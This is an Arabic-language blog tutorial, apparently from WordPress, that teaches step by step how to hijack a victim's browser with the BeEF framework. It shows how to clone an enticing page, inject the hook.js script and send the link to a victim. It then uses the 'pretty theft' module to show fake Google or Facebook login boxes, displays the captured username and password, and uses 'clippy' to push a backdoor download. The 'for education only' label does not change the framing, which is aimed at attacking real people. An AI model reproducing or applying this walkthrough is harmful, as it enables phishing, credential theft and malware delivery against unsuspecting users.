اختراق المتصفح والتحكم به beef xss

for-education-only

السلام عليكم

حبايبى المخترقين فى كل مكان كما وعدتكم بجديد الحيل والاساليب ها انا الان اوفى بوعدى

مقدمة :

الاختراق حيل واساليب وادوات

تختلف الحيل والاساليب والادوات ولكن فى النهايه جميعها تخدم بعضها البعض

اليوم سوف نتحدث عن اداة BeEF xss او Browser Exploitation Framework

ومحدش يسالنى ايه حرف الــ e اللى فى النص ده

هذه الاداه تمكنك من التحكم الكامل بالمتصفح الهدف بل تستطيع من خلالها ارسال ملفات الباك دور او البايلود

ويمكن ربطها فيما بعد بالميتاسبلويت واختراق كامل النظام

 

 

خطوات العمل :

  1. تشغيل beEF xss
  2. تشغيل apache2
  3. حقن الهوك فى صفحة مزوره
  4. التحكم فى المتصفح

 

 

الخطوه الاولى :

تشغيل beef xss freamwork

اضغط زر start فى الكيبورد keyboard20shortcuts_9.jpg او اتجه بالموس الى اعلى يسار الشاشه سيظهر مربع البحث اكتب beef

واضغط على beef Framework

Screenshot from 2016-09-08 16-33-26.png

سوف يظهر لك ترمينال بالاتى

اخر سطر هو ما يهمنا وهو سيكربت الهوك وهو ما سوف نحقنه فى صفحتنا المزوره للسيطره على متصفح الضحيه

http://127.0.0.1:3000/hook.js

Screenshot from 2016-09-08 16-34-44.png

انتظر حتى تفتح لوحة تحكم beef فى المتصفح الخاص بك كالاتى

Screenshot from 2016-09-08 16-35-50.png

اليوزر beef

الباسورد beef

Screenshot from 2016-09-08 16-36-06.png

الان beef تعمل وتنتظر الضحيه لكن تبقى خطوات اضافة الهوك فى صفحة وارسالها للضحيه لكى يتصفحها

 

 

الخطوه الثانيه :

تشغيل apache2

وهو برنامج لانشاء سيرفر مواقع على جهازك وهو ما سوف نستخدمه لخداع الضحيه

 

افتح ترمينال وادخل الامر التالى

service apache2 start

screenshot-from-2016-09-08-16-58-31

للتاكد من انه يعمل اكتب فى المتصفح 127.0.0.1

 

 

الخطوه الثالثه :

حقن الهوك فى صفحة موقع مزوره

يمكنك تصميم صفحة باى شكل تريد لكن الان دعنا نفعلها بالطريقه السهله

افتح اى صفحة موقع وليكن البوم صور او مقال ولكن تاكد من ان الصفحة ستجذب الضحيه حتى يظل بداخلها

لاطول فتره ممكنه حتى تتمكن من اكمال المهمه

 

اولا انشىء فولدر جديد باى اسم وليكن fake داخل فولدر www

عبر الامر التالى

mkdir /var/www/fake

اذا لم تعمل الصفحة معك على هذا المسار استخدم المسار التالى

mkdir /var/www/html/fake

بعد اختيار الصفحة المناسبه قم بحفظها للتصفح offline كالاتى

Screenshot from 2016-09-09 05-35-50.png

احفظها داخل فولدر fake مع تغير اسمها الى index كالتالى

Screenshot from 2016-09-09 05-36-43.png

بعد حفظ الصفحة تكون النتيجة شبيهه للتالى

كل ما يهمنا فولدر الصور والصفحة فقط

Screenshot from 2016-09-09 05-52-00.png

اضغط كليك يمين على الصفحة واختر open with other application

واختر اى محرر نصوص لديك leafpad او gedit

Screenshot from 2016-09-09 05-52-57.png

انسخ كود الهوك من الترمينال الى كود الصفحة تحت وسم html

مع تغيير الاى بى من 127.0.0.1 الى الاى بى الخاص بك لانك لو تركته كما هو فانت تعيد المستخدم الى جهازه

ثم احفظ الصفحه وارسل عنوانها الى الضحيه ويكون العنوان كالاتى

http://yourip/fake

http://55.0.0.10/fake

والان سوف اذهب الى جهازى الاخر وافتح الصفحة كالاتى

Screenshot_1.jpg

وها هى الصفحة

Screenshot_2.jpg

 

 

الخطوه الرابعه :

التحكم بالضحيه

الان بعد انا قام الضحيه بفتح صفحتنا المزوره سوف نجد ان beef امسكته كالتالى

Screenshot from 2016-09-08 17-14-06.png

المربع الاحمر المتصفحات المخترقه جاهزى مع نظام كالى لينكس فى الاعلى ينتهى بـ 10 وجهازى الاخر ويندوز ينتهى بـ 11

عند الضغط على احد تلك الاجهزه تظهر لك بيانات المتصفح لديه فى المربع الاخضر والازرق وهى اصدار المتصفح واللغه والاضافات الخ الخ الخ

المربع الاصفر الصفحة التى تم اختراق الضحيه عن طريقها

الان بعد تحديد الهدف اختر زر commands

سوف تظهر لك كل الاوامر والهجمات المتاحه ولكن فى هذا الدرس سوف نستخدم اخر امر social engineering

نضغط عليها

Screenshot from 2016-09-09 05-56-47.png

ونختار منها  pretty theft

وهى تستخدم لارسال طلب تسجيل دخول جوجل ياهو ويندوز فيسبوك الخ الخ

Screenshot from 2016-09-09 05-57-37.png

على يمين الشاشه اعدادات pretty theft ويمكن من خلالها تغيير نوع مربع تسجيل الدخول الى فيسبوك – تويتر – جوجل كالتالى

Screenshot from 2016-09-09 05-58-40.png

بعد اختيار نوع طلب تسجيل الدخول اضغط زرexecute

 

سوف تظهر للضحيه بهذا الشكل

Screenshot_5.jpg

 

اذا انخدع الضحيه وسجل دخول سوف يظهر لك اليوزر والباسورد كالتالى

اضغط على coomand1 او 2 وسوف تظهر لك البيانات التاليه

data: answer=el2t:memsbaba

اليوزر والباسورد

ansower.jpg

 

 

يمكنك ايضا اجبار الضحيه على تحميل باك دور عبر clippy

Screenshot from 2016-09-09 05-59-02.png

وهى ترسل للضحيه تنبيه كالاتى

Screenshot_6.jpg

 

لكن حتى تظهر صورة الدبوس بدون مشاكل عدل الاى بى فى اعدادات clippy

عدل clippy image directory من 0.0.0.0 الى اى بى جهازك كالتالى

كما يمكنك تغيير نص الرساله ونص ما بعد التحميل

و time until هى اذا رفض الضحيه التحميل ينتظر وقت قد ايه قبل الدبوس ما يوريه وشه تانى

Screenshot from 2016-09-09 06-00-16.png

 

 

هناك اوامر كثيره لم نتكلم عنها مثل التحكم فى الكاميرا واستخراج الكوكيز الخ الخ الخ

ولكن سوف نتحدث عنها فى دروس لاحقه

Screenshot from 2016-09-09 06-08-16.png

الى الان انتهى المرح ولكن دروسنا لم تنتهى بعد فمازلت هناك اساليب اخرى

تابعنا عبر صفحتنا على فيسبوك >>>> https://www.facebook.com/el2tlinux
للاساله توجه لصفحتنا على فيسبوك وابحث عن الدرس وضع مشكلتك مرفق معها سكرين شوت للمشكله

2 comments

اترك رد

إملأ الحقول أدناه بالمعلومات المناسبة أو إضغط على إحدى الأيقونات لتسجيل الدخول:

شعار وردبرس.كوم

أنت تعلق بإستخدام حساب WordPress.com. تسجيل خروج   /  تغيير )

Google photo

أنت تعلق بإستخدام حساب Google. تسجيل خروج   /  تغيير )

صورة تويتر

أنت تعلق بإستخدام حساب Twitter. تسجيل خروج   /  تغيير )

Facebook photo

أنت تعلق بإستخدام حساب Facebook. تسجيل خروج   /  تغيير )

Connecting to %s